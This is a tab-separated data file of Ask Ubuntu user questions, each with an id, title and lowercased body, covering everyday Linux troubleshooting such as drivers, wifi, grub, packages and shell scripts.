357161	if correctly installed , should i see an entry for the dvd drive in fstab , and if not should i add one manually ?	i am having io errors when using eject/eject-t commands and can not load media into the drive ( discussed in another post ) . i was expecting some reference to the dvd drive in fstab - i do not see one . is fstab populated automatically based on devices found during boot ? if a device is not there , does it make any sense to add it manually ? note that my drive is working during boot ( i.e . i installed from the drive ) once ubuntu takes over from the bios thing go awry .
357166	how to copy config-files of a modem , using ssh ?	i have a problem accessing the administrator password of my modem in web interface to reconfigure it . the telnet has been disabled in my modem and i can only 'log in ' using ssh . can i copy the configuration files of my modem using ssh ? can someone share me a link or a command , on how to access this admin password ? by the way i am using windows xp and ubuntu 11.04 .
357169	ide for developing windows phone 8 applications in ubuntu	i used to work with ubuntu , and i do n't want to switch back to windows platform . i am participating in a code contest . in that contest , i need to create windows phone 8 apps . i need an ide in ubuntu for the same , with windows phone 8 emulator . is it possible ?
357171	mp4 plays too fast	i am trying to play an mp4 , but it plays too fast , as in fast-forward . the sound track is on time though . existing solutions do n't apply to me . should i be able to slow down the frame rate on vlc or do i need to edit the mp4 properties ? as suggested below i tried converting the file with avconv to fix the bug . but the conversion did n't succeed , here is the output : > avconv -i ./movie.mp4 ./movie.avi avconv version 0.8.6-4:0.8.6-0ubuntu0.12.04.1 , copyright ( c ) 2000-2013 the libav developers built on apr 2 2013 17:00:59 with gcc 4.6.3 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from '.movie.mp4 ' : metadata : major_brand : m4v minor_version : 1 compatible_brands : isomavc1m4v mp42m4a creation_time : 2013-10-05 15:38:23 artist : album : comment : date : na genre : title : movie duration : 01:49:29.89 , start : 0.000000 , bitrate : 1048 kb/s stream # 0.0 ( eng ) : video : h264 ( high ) , yuv420p , 1280x720 [ par 1:1 dar 16:9 ] , 1999 kb/s , 23.53 fps , 23.53 tbr , 23529 tbn , 47.06 tbc metadata : creation_time : 2013-10-05 15:38:23 stream # 0.1 ( eng ) : audio : aac , 48000 hz , stereo , s16 , 47 kb/s metadata : creation_time : 2013-10-05 15:38:27 [ buffer @ 0x9f929e0 ] w:1280 h:720 pixfmt : yuv420p incompatible sample format 's16 ' for codec 'ac3 ' , auto-selecting format 'flt' [ ac3 @ 0x9f7c740 ] invalid bit rate output # 0 , avi , to './movie.avi ' : metadata : major_brand : m4v minor_version : 1 compatible_brands : isomavc1m4v mp42m4a creation_time : 2013-10-05 15:38:23 artist : album : comment : date : na genre : title : movie stream # 0.0 ( eng ) : video : mpeg4 , yuv420p , 1280x720 [ par 1:1 dar 16:9 ] , q=2-31 , 200 kb/s , 90k tbn , 23.53 tbc metadata : creation_time : 2013-10-05 15:38:23 stream # 0.1 ( eng ) : audio : ac3 , 48000 hz , stereo , flt , 200 kb/s metadata : creation_time : 2013-10-05 15:38:27 stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) stream # 0:1 - > # 0:1 ( aac - > ac3 ) error while opening encoder for output stream # 0:1 - maybe incorrect parameters such as bit_rate , rate , width or height
357177	ubuntu usb failed install	i tried to install ubuntu on usb but it failed . now my usb has 0 free and its not even booting . how can i restore the usb to reinstall the ubuntu
357180	can not mount media device in ubuntu 12.04	i am using ubuntu 12.04 64 bit . i can not able to connect my mobile via usb port . it shows error : unable to find the requested file . please check the spelling and try again . unhandled error message : error when getting information for file '/media/my_name/3c21-0007 ' : no such file or directory what should i do ? thanks in advance : ) : )
357183	is there a program like netstumbler for ubuntu ( to display the channels of local wifi networks ) ?	netstumbler is a program that show the local wifi networks and the channel they use . this is useful if one needs to choose a somewhat free channel for one 's wifi connection . but this is in windows . what about an ubuntu alternative ? update after answer on using kismet+kismon : that is not at all like netstumbler : i have to manually edit a configuration file . from the links provided i understand that i have to install kismet , and run sudo lshw -c network to get the needed data that i have to enter into a configuration file that is accessible by sudo gedit /etc/kismet/kismet.conf . running sudo lshw -c network , i get : *-network description : ethernet interface product : netxtreme bcm5751m gigabit ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:10:00.0 logical name : eth0 version : 11 serial : 00:14 : c2 : dd:01 : c9 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.128 firmware=5751m-v3.29a latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : c8000000-c800ffff *-network description : wireless interface product : pro/wireless 2200bg [ calexico2 ] network connection vendor : intel corporation physical id : 4 bus info : pci @ 0000:02:04.0 logical name : eth1 version : 05 serial : 00:15:00:3b : d1:20 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ipw2200 driverversion=1.2.2kmprq firmware=abg:9.0.5.27 ( dec 12 2007 ) ip=192.168.0.10 latency=64 link=yes maxlatency=24 mingnt=3 multicast=yes wireless=ieee 802.11bg resources : irq:21 memory : c8400000-c8400fff so confusing . 9 pages of forum for that ? can i get simple instructions ? also , i worry for something like : ~ $ kismet launching kismet_server : //usr/bin/kismet_server suid priv-dropping disabled . this may not be secure . done what does this mean , not secure ? also , here it says : `` when quitting kismet , it leaves your wireless card stuck in monitor mode . to revert back to managed mode ( client mode ) , the commands would be similar to the following : sudo ifconfig wlan0 down sudo iwconfig wlan0 mode managed sudo ifconfig wlan0 up what does this mean ? do i have to run those ( in fact not those lines , but other , similar but different info -- - ) each time ( after ) i use kismet ? in the configuration file i have edited only 2 lines : 13 suiduser=cipricus and 27 source=ipw2200 , eth1 , intel but this is what happens : ~ $ kismet launching kismet_server : //usr/bin/kismet_server suid priv-dropping disabled . this may not be secure . done . and : ~ $ kismon ( kismon:7877 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( kismon:7877 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( kismon:7877 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( kismon:7877 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( kismon:7877 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , client : start 127.0.0.1:2501 client : open connection to 127.0.0.1:2501 failed : [ errno 111 ] connection refused kismet_server must be running to get live data client : stop
357184	`` quickly design '' and ubuntu 13.10 ?	i upgraded to ubuntu 13.10 and then i installed quickly to develop some apps . when i run `` quickly run '' or `` quickly edit '' everything is fine , but when run `` quickly design '' glade open and close directly . i tried uninstall and install quickly , but nothing and when try to open .ui file in my app directory , i ca n't to edit it because there is error in requirement . the version of glade i have 3.14.2 when create new file glade in glade it works fine . is there any way to let quickly use gtk2 instead gtk3 ? or fix force close ?
357186	how to change the header title and help message in grub menu ?	how to change the header title and help message in grub menu ? knowing that my grub version is 1.99-21ubuntu3 i 'm using ubuntu 12.04
357188	keep synclient settings persistent	i 've created the following file : /usr/share/x11/xorg.conf.d/51-synaptics-userdefined.conf : ( copy of 50-synaptics.conf , only desired stuff changed and posted ) section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' option `` horizedgescroll '' `` true '' option `` horizscrolldelta '' `` 106 '' option `` rtcornerbutton '' `` 0 '' option `` shmconfig '' `` on '' matchdevicepath `` /dev/input/event* '' endsection however , the settings are n't applied and everytime ubuntu starts i have to apply the settings manually . what am i doing wrong ?
357189	make [ 1 ] : leaving directory `/home/danial/desktop/trilearn_base_sources-3.6 '	hi i want to work with trilearn_base sources-3.6 but afther i configure when i want to make it became problem make [ 2 ] : leaving directory /home/danial/desktop/trilearn_base_sources-3.6/src' make [ 2 ] : entering directory/home/danial/desktop/trilearn_base_sources-3.6' make [ 2 ] : leaving directory /home/danial/desktop/trilearn_base_sources-3.6' make [ 1 ] : leaving directory/home/danial/desktop/trilearn_base_sources-3.6' how should i to solve it plz any help could be greatful tnx
357191	remove cinnamon & nemo completely	yesterday i installed cinnamon and nemo but did n't like it ( do n't ask me why ) . i am using unity now and i has no reason to remove cinnamon but now when i launch nautilus from terminal , i get this error : initializing nautilus-dropbox 1.4.0 nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare' returned error 255 : info_fn : file /var/lib/samba/usershares/files is not a well formed usershare file . info_fn : error was path is not a directory . this is the first time i am seeing this error , and i think removing cinnamon & nemo will solve the problem ( but i want to remove it anyway ) . so , sudo apt-get autoremove cinnamon nemo shows that only ~7mb space will be freed , while ~70mb was downloaded . where 's the rest of space ? and how do i solve that nautilus problem ?
357192	wifi disconnecting and weak signal	i got a problem with my lenovo g575 and my wifi . i 've started using ubuntu 12.04 one week ago , and from that time i have a problem with wifi . it 's disconnecting and asking me for password for wifi once a 5-10 minutes . i 'm searching on google what 's the problem but i do n't find a solve . iwconfig wlan0 wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lspci -nn | grep wireless 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no i have no idea what can i do ! i got nexus7 and his wifi is ok
357194	apache : restrict web page access to windows domain users	i have a ubuntu server 12.04 running on a vps and it has a web server on it running the latest version of apache , mysql and php . how can i restrict access to my server so only people trying to authenticate from a certain domain ( s ) can access the webpage ? the server can not be a dc since i will not have control over the various servers that users will be allowed to access from . any ideas ?
357196	best professional video editor for linux equivalent to sony vegas pro ?	i have recently moved onto linux especially ubuntu , and i 'm a video freak , i love editing videos for my youtube channel , and since i 'm new to this open source world , i can not decide which one should i choose ? i had done a search on google which presented me with pitvi , open shot and such editors but what i really want is , is there any video editor in linux world equivalent to sony vegas video editor ? ( for professional use )
357197	help- says `` running in low graphics mode '' at startup , have followed tutorials but never works ?	i am trying to fix my computer so i can give it to my little brother . when i turn it on , it tells me it is running in low graphics mode . i have tried a bunch of tutorials and none have worked . i can get up to failsafe x , but when i select it the screen does this weird thing . it looks sort of pixelated or kind of like a woven texture . it starts black and gradually turns to a bluish color , then an orangeish color , and then black again . i am having so many issues with ubuntu ( i have the newest version . ) also , i was going to just reinstall it but the only flashdrive i could find is read only and i do not know how to fix that . i am using my macbook to do all of this . my brothers birthday is tomorrow so i need to get this done asap ! thank you so much !
357199	help with shut down	i just built a new computer and installed linux on my old hdd , its working fine excpet when i shut it down from the desktop it wont shut down , i have to manually hold the computers shut down button , until it shut downs . asus sabertooth z77 i7 3770k gtx 550ti corsair 700w ( i dont rember anything else about it ) 8gb kingston hyperx blue 1600mhz aand i dont rember the hdd when i did sudo shutdown -c and sudo shutdown -h now it gave me this : . . . . [ 242.726776 ] power down [ ok ] unmounting local filesystems ault/speech-dispatcher [ ok ] stopping remaining crypto disks ... . 5 , shutting down [ ok ] stopping early crypto disks [ fail ] stopping early crypto disks [ ok ] umount /run/lock : not mounted umount /run/shm : not mounted mount : / is busy will now halt
357203	broken packages because of trying to install adobe connectaddin	on 13.04 i tried to install adobe connectaddin , but now i have broken packages all because of it . i have tried sudo apt-get install -f , and removed the .deb file , but still i have 4 broken packages , connectaddin , and the 3 libmtrf0 files . is there anyway to remove these broken packages ? synaptic does n't seem to want to remove these .
357204	is there a way to re-install ubuntu software center	my ubuntu software center keeps crashing it wont open : ( this happened after i installed gnome 3.10 and then i gnome 3.10 but the issue keeps happening is there a way to reinstall the usc
357207	how can i import data from outlook to thunderbird ?	i am using windows 7 and outlook 2010 . i am really annoyed with microsoft , so i want to switch to ubuntu ( where thunderbird is installed ) . in outlook i have my emails , some appointments and all contacts . i also have two archives ( pst files ) with mails . windows 7 is installed in c : \ and my `` documents '' drive is d : \ . so when i switch to ubuntu , the drive d : \ will ( hopefully ) remain . how can i import my mails and my contacts from outlook to thunderbird ( linux ) ? is it possible to import filters from outlook to thunderbird ? is there a way to tell thunderbird in linux to store all data on the d : drive ( i do n't know if in linux the drive will have an other name ) ? how can i import my mails from my pst files into thunderbird on ubuntu ?
357213	how to get correct graphics driver ? for pentium 4 , intel d845gvsr motherboard	i installed graphics driver using intel-linux-graphics-installer but my lubuntu went blank.. **i.e . after booting only black screen appears . ** my system is pentium 4 2.4ghz , motherboard intel d845gvsr , 1 gb ram etc . how to get correct graphics driver ? i want to play games using wine but could not find proper driers . intel website has drivers in .rpm format not .deb
357217	problem with bundle install in ror	i am using rvm and using ruby-1.9.2-p180 when i enter my project i get : you are using '.rvmrc ' , it requires trusting , it is slower and it is not compatible with other ruby managers , you can switch to '.ruby-version ' using 'rvm rvmrc to [ . ] ruby-version' or ignore this warning with 'rvm rvmrc warning ignore /home/sony/rails_projects/teamrubyracer-whiteboard/.rvmrc ' , '.rvmrc ' will continue to be the default project file in rvm 1 and rvm 2 , to ignore the warning for all files run 'rvm rvmrc warning ignore all.rvmrcs ' . using /home/sony/.rvm/gems/ruby-1.9.2-p180 with gemset whiteboard warning ! executable 'gem ' missing , something went wrong with this ruby installation ! warning ! executable 'irb ' missing , something went wrong with this ruby installation ! when i enter : bundle install i get.. /usr/lib/ruby/vendor_ruby/1.8/rubygems/dependency.rb:247 : in `to_specs ' : could not find bundler ( > = 0 ) amongst [ minitest-1.6.0 , rake-0.8.7 , rdoc-2.5.8 ] ( gem : :loaderror ) from /usr/lib/ruby/vendor_ruby/1.8/rubygems/dependency.rb:256 : in `to_spec' from /usr/lib/ruby/vendor_ruby/1.8/rubygems.rb:1231 : in `gem' from /usr/local/bin/bundle:22 this has been troubling since a pretty long time . any help would be appreciated .
357218	ubuntu 13.04 not detecting all of my drives	i want to use dual boot system ( win 8 x64 & ubuntu 13 x64 ) in my hp pavillion laptop . there are four drives available in my 1tb hard drive . but when i trying to install ubuntu 13 from usb stick , it shows only one drive ( 1 tb ; a whole drive ) . i do n't identify the problem . please help me .
357219	how to update libpango and install cairo in ubuntu ?	i want to install `` php gtk '' , but i get the following error message : `libgtk2.0-dev : depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed i downloaded the latest pango from here . when i ran the command : ./configure , it gave me the following error message : checking for harfbuzz ... no no checking for coretext availability ... no checking for cairo ... no no configure : error : could not enable any backends . must have at least one backend to build pango i tried to install php_cairo , but it gives an error too : checking for cario ... not found configure : error : oops ! no cairo detected in the system how can i update libpango , and install cairo ? thanks .
357220	how to check if sudo password has been entered for this terminal session ?	as said in the headline , i need to check if the sudo password has been entered for this terminal session in a shell ( aka , if i have sudo rights now ) . if i have it , i would like to do one thing and if i do n't have it , then it should not prompt me for it , just let me do another thing . so in pseudo code it looks like this : if ( sudo = true ) echo `` i got sudo '' else echo `` i dont have sudo '' fi but all commands i 've found for this always prompts me for the sudo password when trying to check . basic idea is that the script can ( and will ) ask for sudo password several places , but i do n't want to print out `` the script will now ask for your sudo password . '' if it has already been entered ( which means it wont ask for the sudo password ) . hope someone can help me .
357221	ubuntu in acer will become idle while using	i installed ubuntu 13.04 in my acer aspire v5 121 . speed is low compared to windows . it will become idle while using . nothing will work at that time . and we have to switch off and switch on using power button .
357223	how do i uninstall ubuntu 13.04 ?	hey i want to dual boot ubuntu 13.04 and according to the installation guide you just choose install alongside windows . i have used ubuntu 12.04 for a while now and i have to reformat my windows 7 so i thought i would try to install ubuntu 13.04 . my question is when you install ubuntu through wubi it is easy to uninstall but is it the same if i would uninstall ubuntu 13.04 ? or if not `` is there a good uninstallation guide '' ? .
357226	why ca n't i use anything i download/why ca n't i download unbuntu restricted ?	i 'm a new user to linux in general and i 'm trying to download ubuntu restricted add-ons package and i 'm having trouble downloading anything . my computer said to download adobe installer and i did , but i ca n't finish the installation because my computer is showing the files in a different form than i 'm used to , and i 'm very confused . any ideas on what 's wrong and how i can fix it ? any feedback is welcomed . thanks in advanced .
357232	how can i transfer ubuntu from a stick to a new ssd	my ssd died a month ago , i ordered a new ssd that has just arrived . in the meantime i had installed ( with friendly help ) and had been running ubuntu from a usb stick . now i 'd like to transfer ubuntu from the usb stick on to the new installed ssd . what should i do ? at the moment the ssd is not mounted and is formatted as fat 32 bits .
357236	i cant connect to the wireless internet on uuntu 13.04	im a new ubuntu user and i just installed ubuntu 13.04 to run alongside windows . i can only get a connection through an ethernet cable and i dont know how to connect to the internet online . my wifi cart is a realtek wireless lan for windows but im not sure what it is for ubuntu . is there a driver i can download for it to work ? annon
357237	install to sd ( removable flash : sdhc , emmc ) with f2fs ?	the question was asked over 2 years ago and clearly it was not smart to try it mainly due to the usb bottleneck of the card reader . can we expect the situation to be any different today ? sd cards are faster ( or it 's cheaper to get faster ones ) , card readers may transition to usb 3.0 ( not too soon ? ) , it is possible to just install the system to a sd/mmc ( /home on hdd ) and use f2fs ( with minor tweaking , /boot on a different partition fs , saucy coming with gparted 0.16 ) . [ well i hope the result is better than a live-usb ... ] bonus question : could mmc be better than sd ( my vaio has a dedicated mmc reader that would thus be put to good use ) ) ) ?
357240	i need a good solution to bypass internet censorship on ubuntu	i live in iran , where many websites are blocked from access by a professional local firewall . i 'm looking for a free vpn , https , or any possible proxy software/solution for ubuntu that could let me to bypass the censorship , so that i could at least access facebook and twitter . i 'm saying free because i 'm a full time college student and i really ca n't afford buying a vpn service alongside of other costs to just be able to access facebook and twitter . i do use hotspot shield for windows , which is very fast and does the job . but for ubuntu os , i could n't manage to find a good solution . i have tried tor also , but tor is very , very slow . i ca n't even open a webpage without waiting for more than 5-10 minutes . if you know any good and fast solution for bypassing censorship on ubuntu , please let me know . i ca n't wait to browse all kinds of pages that i want in ubuntu . thank you .
357242	show grub menu from the start on ubuntu 13.04	i 'm new on ubuntu , i just installed the 13.04 version , and i 'd like to know if there is any way to make the grub menu be the first thing to appear in my screen when i tun on my computer . if there is , could you explain me the steps to follow ? thank you ! ! !
357247	folder links not working after reboot	i want to create a link ( like shortcut in windows ) to a folder stored in one of my drives . i right click on the folder and select make link . then i cut and paste this link to the desktop . it works fine in the same session but when i reboot and try to open the link , it says this link is broken . the drive is of ntfs format which i use when using windows . i 'll furnish any additional details if required .
357248	how to remove special 'm-bm- ' character with sed	file : https : //dl.dropboxusercontent.com/u/32919746/file i have file that was created by copying content from docx document with libreoffice into text file . i have modified file with sed to remove additional spaces and other stuff but then i noticed space that was immune to regular command : `sed -r 's : some-text : some-text : g ' -i file after using cat -a file i found out that this looks like this : < p > m-bm- lorem ipsum < /p > how to remove it ?
357250	nvidia driver - after install - no unity or black screen with cursor	i 'm using ubuntu 13.04 x64 , i 've tried many distros based on ubuntu/debian as well . for example : mint 13,14,15 kde & cinnamon , kubuntu , xubuntu etc . my graphic cards : - intel ( r ) hd graphics 4000 ( default ) - nvidia geforce gt635m 2gb ( need to be installed correctly ) i was looking on the internet to find the sulotion , but nothing . then i tried : sudo apt-get install nvidia-current nvidia-settings after reboot , unity dissappered or black screen with cursor . i 've also tried to look into `` driver manager '' but there was nothing to install.. someone knows the solution ? how to install my nvidia driver correctly and make it working .
357254	i ca n't rename a file using the terminal if it came from a parameter	i am automating some deployment task with an .sh script but at some point i need to rename a file but it is not working . the file change can be different but the postfix is the same . let 's have a look at this example so you will understand what is that i exactly need : read foldername # ... at somepoint this scripts creates a file called foldername-1.0-snapshot.war ( i need to rename it ) oldexecutablename = '' '' + $ foldername + `` -1.0-snapshot.war '' newexecutablename = '' '' + $ foldername + `` .war '' [ [ -f `` $ { newexecutablename } '' ] ] & & mv -v $ { oldexecutablename } $ { newexecutablename } example : given input filename desired name for file is : filename.war the text -1.0-snapshot should be removed from the name of the file for some reason this is not working , and i think it is because the parameter i am reading from the terminal . can someboby give me a hand to rename this ?
357261	xubuntu xfce problem	i have been using xubuntu on my old laptop and it has been working great . the other day , i made a lot of updates and after requested login , the xfce is no longer functioning properly . i can start applications by choosing them from the list after pushing ctrl+f3 , but i can not see the icons nor the tool bar , status bar or anything else on the screen . i also get an error message after startup saying that something crashed but when i click on the screen , it just disappears and i can no longer see it . i tried to repair my installation , but it did n't help either , anyone know how i can clean up the xfce and get it to work properly ? my laotop is an old compaq 6715b with 4g memory .
357263	grafic problems on ubuntu 12.04	i have exactly this question , but ca n't comment on posts . so i tried > sudo dpkg -i gawk_4.0.1+dfsg-2_i386.deb and got output : selecting previously unselected package gawk : i386 . dpkg : error processing gawk_4.0.1+dfsg-2_i386.deb ( -- install ) : gawk : i386 1:4.0.1+dfsg-2 ( multi-arch : foreign ) is not co-installable with gawk : amd64 1:3.1.8+dfsg-0.1ubuntu1 ( multi-arch : foreign ) which is currently installed errors were encountered while processing : gawk_4.0.1+dfsg-2_i386.deb i am using i3 processor with integrated grafic chip . additionally i am having problems with my grafic driver with outputs like could not set video mode : could n't find matching glx visual or glx not found . aborting . when i try to run programs in grafic mode . is my ubuntu installation messed up ? how can i test for the installation/setup and how can i fix it ? greetings edit i also tried this : how can i get my graphics card to be recognized in system info ? i am still getting no info about the installation . and i tried : http : //askubuntu.com/a/215967/178744 but it 's not working either . maybe there is an up-to-date solution ? edit2 > sudo lshw -c video gives pci ( sysfs ) *-display description : vga compatible controller product : ivy bridge graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:4000 ( size=64 ) edit3 following some more informations , how can i fix my installation ? ~ > glxinfo name of display : :0 error : could n't find rgb glx visual or fbconfig and ~ > egrep -i 'glx|nvidia ' /var/log/xorg.0.log [ 22.961 ] ( ii ) loadmodule : `` glx '' [ 22.961 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 22.961 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 22.961 ] ( == ) aiglx enabled [ 22.961 ] ( ii ) loading extension glx [ 23.172 ] ( ee ) aiglx error : dlopen of /usr/lib/x86_64-linux-gnu/dri/i965_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/i965_dri.so : can not open shared object file : no such file or directory ) [ 23.172 ] ( ee ) aiglx : reverting to software rendering [ 23.172 ] ( ii ) aiglx : screen 0 is not dri capable [ 23.172 ] ( ee ) aiglx error : dlopen of /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : can not open shared object file : no such file or directory ) [ 23.172 ] ( ee ) glx : could not load software renderer [ 23.172 ] ( ii ) glx : no usable gl providers found for screen 0 and ~ > egrep '\ ( ( ee|ww|ni ) \ ) ' /var/log/xorg.0.log ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 22.917 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 22.917 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 22.917 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 22.917 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 22.917 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 22.917 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 22.966 ] ( ww ) falling back to old probe method for vesa [ 22.966 ] ( ww ) falling back to old probe method for fbdev [ 23.172 ] ( ee ) aiglx error : dlopen of /usr/lib/x86_64-linux-gnu/dri/i965_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/i965_dri.so : can not open shared object file : no such file or directory ) [ 23.172 ] ( ee ) aiglx : reverting to software rendering [ 23.172 ] ( ee ) aiglx error : dlopen of /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so failed ( /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so : can not open shared object file : no such file or directory ) [ 23.172 ] ( ee ) glx : could not load software renderer
357266	how to show time in ubuntu 13.10	just upgraded from 13.04 to 13.10 . everything went fine but i do n't see the time in the top right corner of the 'top bar ' anymore . i tried to right click on it so i could get some options but nothings shows . i 'm sure it 's obvious but i do n't see it .
357269	network connections icon does not apear on acer aspire one d270	i recently installed ubuntu 12.04 on my acer aspire one d270 and the icon for connecting to wireless on the top panel does n't work when i do n't have a broadband internet cable pluged-in already . also i previously had an ubuntu 11.04 installed on the same computer and both wireless and and wired connections worked with that version of ubuntu . edit $ lspci 00:00.0 host bridge : intel corporation atom processor d2xxx/n2xxx dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation atom processor d2xxx/n2xxx integrated graphics controller ( rev 09 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation nm10/ich7 family sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 )
357271	opening port 3000 ec2 amazon web services	i am trying to use nodejs and socket.io to deliver a webapp , which use websocket on port 3000 . i have opened port 3000 on my ec2 instance in my management console by adding the inbound tcp rule to the relevant security group , however i still ca n't access it via public dns on my browser . sudo netstat -tulpn does n't show it as an open port . what am i missing ? is there some service i need to restart or a command line i need to push to get it running ? thanks
357273	a4tech keyboard and mouse not working at login ubuntu 12.04	i just installed ubuntu 12.04 onto my desktop . mouse was n't recognized at any point , the keyboard worked just fine through the install and at the boot menu , but as soon as it gets to the login screen , it stops working completely . usb legacy support is enabled in bios . i 've found similar threads but have n't found one with an answer .
357276	i have no icons or even launcher in ubuntu desktop	i 'm new in ubuntu . i have installed ubuntu for one month , but during this time i encountered this problem ( removing icons or even launcher from ubuntu desktop ) for two times . this problem comes to me after running make command in terminal . in fact in the middle of make process i got error that was different in each times . when i closed terminal after getting error , i turned off computer then i turned it on but there was nothing on my desktop , neither icons nor launcher . what is my problem ? this problem forced me to reinstall ubuntu several times and this bothered me . thank you for your attention . thank you lorenzo now i reinstalled ubuntu again . unfortunately i did n't save those errors but i guess it will repeat again . infact , i wanted to install special software that i got the error . in it 's installation guide had been said i must separate binary and source files from each other . i did n't know the difference between binary and source file therefore simply entered to software directory and ran ccmake comand then called make and got the error that i said before . may be this explanation have a clue for solving my problem . thank you
357277	mail use gpg encryption	i would like to send emails encrypted with gpg from a shell script . is there any way to send emails with gpg ? or encrypt them using mail ?
357278	launching zte mf92 hsdpa modem	i get this error when i try to launch my zte modem using the sudo wvdial command on terminal julioceaser @ julioceaser-np300e5v : ~ $ sudo wvdial -- > wvdial : internet dialer version 1.61 -- > can not set information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > modem initialized . -- > configuration does not specify a valid phone number . -- > configuration does not specify a valid login name . -- > configuration does not specify a valid password . julioceaser @ julioceaser-np300e5v : ~ $ sudo gedit /etc/wvdial.conf
357279	problem detecting wireless drivers/module in 12.04 in lenovo g570	i have a lenovo g570 laptop.i have installed ubuntu 12.04 along with windows 7 ( dual boot ) . whenever i log into ubuntu and try to connect to a wifi hotspot , the network does not even recognize wireless networks and the the option enable wireless ca n't be selected . now suppose i keep lenovo wireless driver on ( windows ) ( i.e ) enabled in software , i can recognize the wifi hotspots in ubuntu.is there any way to resolve this problem ? thanks and regards in advance .
357282	do updates make speed of system slower ?	i 'm using ubuntu 12.04 should i download and install all of security updates ? ( about 500 mb ) if i do it , it does n't make system speed slower ?
357288	suspend does n't happen at all	i have an dell inspiron n5110 with nvidia graphic . it has 12.10 and windows installed on . it was working fine until a morning when i turned it on an message appeared which said ubuntu can not found your graphic ( sth like that ) and it asked if it could reconfigure the graphic card . i have pushed the button nothing actually happened after a reset ubuntu graphic interface started nice but when i was going to suspend in any way , apparently , nothing happens . even the screen does n't turn black . i should mention after switching to windows it could n't find my nvidia graphic but after reinstalling the driver i could sleep my laptop in windows . but it still not suspending in ubuntu .
357295	what is defference between binary and source file	i want to install special software on ubuntu . in it 's installation guide has been mentioned i must seperate binary and source files from each other . what does it mean ? how can i do that ? thanks thank you you mean that i should ignore the point of instruction about separating binary and source files ? i downloaded git source of special software from internet . it is a zip file that consists of 9 folders ( “cmake” , “cmakefiles” , “docs” , “gui” , “modellingframework” , “optimisation” , “otbsuppl” , “qtpropertybrowser” and “shared” ) and 6 files ( “cmakelist.txt” , “gplv3.txt” , “install” , “license” , “lumassconfig.h.in” and “readme” ) . i did n't understand what they are ? sorry , i 'm very unfamiliar with linux and ubuntu . thanks alot
